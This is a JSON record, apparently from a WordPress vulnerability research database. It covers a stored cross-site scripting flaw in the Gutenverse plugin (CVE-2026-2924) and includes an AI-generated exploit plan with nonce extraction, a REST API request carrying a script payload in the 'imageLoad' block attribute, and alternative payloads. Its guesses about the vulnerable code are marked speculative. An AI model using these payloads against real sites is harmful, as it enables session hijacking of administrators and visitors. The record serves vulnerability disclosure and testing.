[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fWiOJUawlORR2lf_cQLxNLPgJUJf50sEIArDuMuvKsGw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-2924","gutenverse-ultimate-wordpress-fse-blocks-addons-ecosystem-authenticated-contributor-stored-cross-site-scripting-via-imag","Gutenverse – Ultimate WordPress FSE Blocks Addons & Ecosystem \u003C= 3.4.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'imageLoad'","The Gutenverse – Ultimate WordPress FSE Blocks Addons & Ecosystem plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'imageLoad' parameter in versions up to, and including, 3.4.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","gutenverse",null,"\u003C=3.4.6","3.4.7","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-03 13:45:17","2026-04-04 02:26:20",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F950f7493-4ccb-4a8a-9cc2-23b9ba3a9cd0?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fcss\u002Fblocks.css","assets\u002Fcss\u002Ffrontend\u002Fimage-box.css","assets\u002Fjs\u002Fblocks.js","assets\u002Fjs\u002Ffrontend\u002Fanimated-text.js","assets\u002Fjs\u002Ffrontend\u002Fchart.js","assets\u002Fjs\u002Ffrontend\u002Fpopup-builder.js","assets\u002Fjs\u002Ffrontend\u002Fteam.js","assets\u002Fjs\u002Fwizard.js","researched",false,3,"This research plan focuses on exploiting a Stored Cross-Site Scripting (XSS) vulnerability in the **Gutenverse** plugin (CVE-2026-2924). The vulnerability is accessible to authenticated users with **Contributor** permissions or higher via the `imageLoad` block attribute.\n\n### 1. Vulnerability Summary\nThe Gutenverse plugin for WordPress fails to properly sanitize and escape the `imageLoad` attribute used in one of its Gutenberg blocks (likely the **Image Box** or a related image block). Because Gutenberg block attributes are stored as JSON-encoded data within the `post_content`, a Contributor-level user can inject a malicious payload into this attribute. When the post is rendered on the frontend or previewed by an administrator, the payload is executed in the context of the victim's session.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts` (WordPress REST API) or the `post.php` admin interface.\n*   **Vulnerable Parameter (Attribute):** `imageLoad` within a Gutenverse block (e.g., `gutenverse\u002Fimage-box`).\n*   **Authentication:** Required (Contributor+).\n*   **Preconditions:** The Gutenverse plugin must be active. The attacker must be able to create or edit a post.\n\n### 3. Code Flow\n1.  **Input:** A Contributor creates or updates a post containing a Gutenverse Gutenberg block. The block markup looks like this: `\u003C!-- wp:gutenverse\u002Fimage-box {\"imageLoad\":\"[PAYLOAD]\"} \u002F-->`.\n2.  **Storage:** WordPress saves the raw block markup into the `post_content` column of the `wp_posts` table.\n3.  **Processing:** When the post is viewed, WordPress parses the block. The Gutenverse plugin's PHP rendering logic (likely a `render_callback`) retrieves the `imageLoad` attribute from the `$attributes` array.\n4.  **Sink:** The plugin echoes the value of `imageLoad` into the HTML output (likely as an attribute or part of a script initialization) without calling `esc_attr()`, `esc_html()`, or `wp_kses()`.\n5.  **Execution:** The browser interprets the injected script, resulting in XSS.\n\n### 4. Nonce Acquisition Strategy\nTo update a post via the REST API as a Contributor, a **REST API Nonce** is required.\n1.  **Navigate:** Use `browser_navigate` to go to the WordPress Dashboard (`\u002Fwp-admin\u002Findex.php`) as the Contributor user.\n2.  **Extract:** Use `browser_eval` to extract the nonce from the global `wpApiSettings` object:\n    *   `browser_eval(\"window.wpApiSettings?.nonce\")`\n3.  **Alternative:** If the REST API is restricted, the nonce can be found in the `post.php` editor page under the variable `_wpnonce`.\n\n### 5. Exploitation Strategy\nThe goal is to inject a payload into the `imageLoad` attribute of a Gutenverse block.\n\n**Step-by-step Plan:**\n1.  **Identify Block Name:** Based on `assets\u002Fcss\u002Ffrontend\u002Fimage-box.css`, the most likely block slug is `gutenverse\u002Fimage-box`.\n2.  **Prepare Payload:** Use a standard attribute breakout payload.\n    *   Payload: `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n    *   JSON-safe version: `\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n3.  **Create\u002FUpdate Post:** Send a POST request to the REST API to create a new post with the malicious block content.\n\n**Request Details:**\n*   **Method:** `POST`\n*   **URL:** `http:\u002F\u002F[TARGET]\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`\n*   **Headers:**\n    *   `Content-Type: application\u002Fjson`\n    *   `X-WP-Nonce: [EXTRACTED_NONCE]`\n*   **Body:**\n    ```json\n    {\n      \"title\": \"XSS Test\",\n      \"status\": \"draft\",\n      \"content\": \"\u003C!-- wp:gutenverse\u002Fimage-box {\\\"imageLoad\\\": \\\"\\\\\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\\\"} \u002F-->\"\n    }\n    ```\n\n### 6. Test Data Setup\n1.  **User:** Create a user with the `contributor` role.\n2.  **Plugin:** Ensure **Gutenverse** (slug: `gutenverse`) is installed and activated.\n3.  **Post:** (Optional) Identify an existing post ID that the contributor has permission to edit.\n\n### 7. Expected Results\n1.  The REST API should return a `201 Created` or `200 OK` response.\n2.  When an Administrator views the \"All Posts\" screen and clicks \"Preview\" on the contributor's draft, an alert box showing the document domain should appear.\n3.  The HTML source code of the rendered page should contain the raw payload: `\u003Cdiv ... data-image-load=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\" ...>` (or similar placement).\n\n### 8. Verification Steps\n1.  **Check DB:** Use `wp post get [ID] --field=content` to verify the payload is stored in the database exactly as sent.\n2.  **Check Frontend:** Use the `http_request` tool to fetch the preview URL or the published post URL and grep for the script:\n    *   `http_request(url=\"http:\u002F\u002F[TARGET]\u002F?p=[ID]&preview=true\", method=\"GET\")`\n    *   Verify the existence of `\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n\n### 9. Alternative Approaches\n*   **Different Blocks:** If `gutenverse\u002Fimage-box` is not the correct slug, check for other image-related blocks by running: `wp eval \"print_r(WP_Block_Type_Registry::get_instance()->get_all_registered());\" | grep gutenverse`.\n*   **Attribute Context:** If the `imageLoad` attribute is rendered inside a JavaScript string (e.g., `initBlock({load: 'VALUE'})`), change the payload to: `');alert(1);\u002F\u002F`.\n*   **Classic Editor:** If the block editor is disabled, use the standard `wp-admin\u002Fpost.php` interface with the block markup in the raw text editor.\n*   **Bypass Nonce:** If nonces are strictly enforced and the REST API is unavailable, the Contributor can simply use the standard WordPress Dashboard UI to create a post and insert a \"Custom HTML\" block, though the vulnerability specifically targets the `imageLoad` attribute of a *Gutenverse* block.","The Gutenverse plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the 'imageLoad' block attribute in versions up to 3.4.6. This allows authenticated users with Contributor-level permissions or higher to inject malicious JavaScript into posts, which executes when a user views or previews the affected content.","\u002F* The vulnerability exists because the 'imageLoad' attribute within Gutenverse blocks \n   (such as gutenverse\u002Fimage-box) is rendered without proper sanitization or escaping. *\u002F\n\n\u003C!-- wp:gutenverse\u002Fimage-box {\"imageLoad\":\"[MALICIOUS_PAYLOAD]\"} \u002F-->\n\n--- \n\n\u002F* While the registration is in minified JS, the block structure demonstrates the sink *\u002F\n\u002F* assets\u002Fjs\u002Fblocks.js *\u002F\n\u002F\u002F The imageLoad attribute is parsed and output to the DOM, often as a data attribute \n\u002F\u002F or part of a script initialization, without being passed through esc_attr or similar.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgutenverse\u002F3.4.6\u002Fassets\u002Fcss\u002Fblocks.css \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgutenverse\u002F3.4.7\u002Fassets\u002Fcss\u002Fblocks.css\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgutenverse\u002F3.4.6\u002Fassets\u002Fcss\u002Fblocks.css\t2026-02-12 06:44:12.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fgutenverse\u002F3.4.7\u002Fassets\u002Fcss\u002Fblocks.css\t2026-02-24 08:42:58.000000000 +0000\n@@ -1 +1 @@\n-@charset \"UTF-8\";.flatpickr-calendar{animation:none;background:transparent;background:#fff;border:0;border-radius:5px;box-shadow:1px 0 0 #e6e6e6,-1px 0 0 #e6e6e6,0 1px 0 #e6e6e6,0 -1px 0 #e6e6e6,0 3px 13px rgba(0,0,0,.08);box-sizing:border-box;direction:ltr;display:none;font-size:14px;line-height:24px;opacity:0;padding:0;position:absolute;text-align:center;touch-action:manipulation;visibility:hidden;width:307.875px}... (truncated)","1. Authenticate to the WordPress site as a Contributor or higher.\n2. Obtain a REST API nonce from the WordPress dashboard (e.g., via `window.wpApiSettings.nonce`).\n3. Send a POST request to `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts` to create or update a post.\n4. In the request body, include a Gutenverse block (e.g., `gutenverse\u002Fimage-box`) within the `content` field.\n5. Set the `imageLoad` attribute of that block to an XSS payload, such as: `\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n6. Save the post as a draft or publish it. When an administrator or visitor views the post, the script in the `imageLoad` attribute will be rendered into the page source and execute.","gemini-3-flash-preview","2026-04-17 21:45:17","2026-04-17 21:45:56",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.4.6","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgutenverse\u002Ftags\u002F3.4.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgutenverse.3.4.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgutenverse\u002Ftags\u002F3.4.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fgutenverse.3.4.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fgutenverse\u002Ftags"]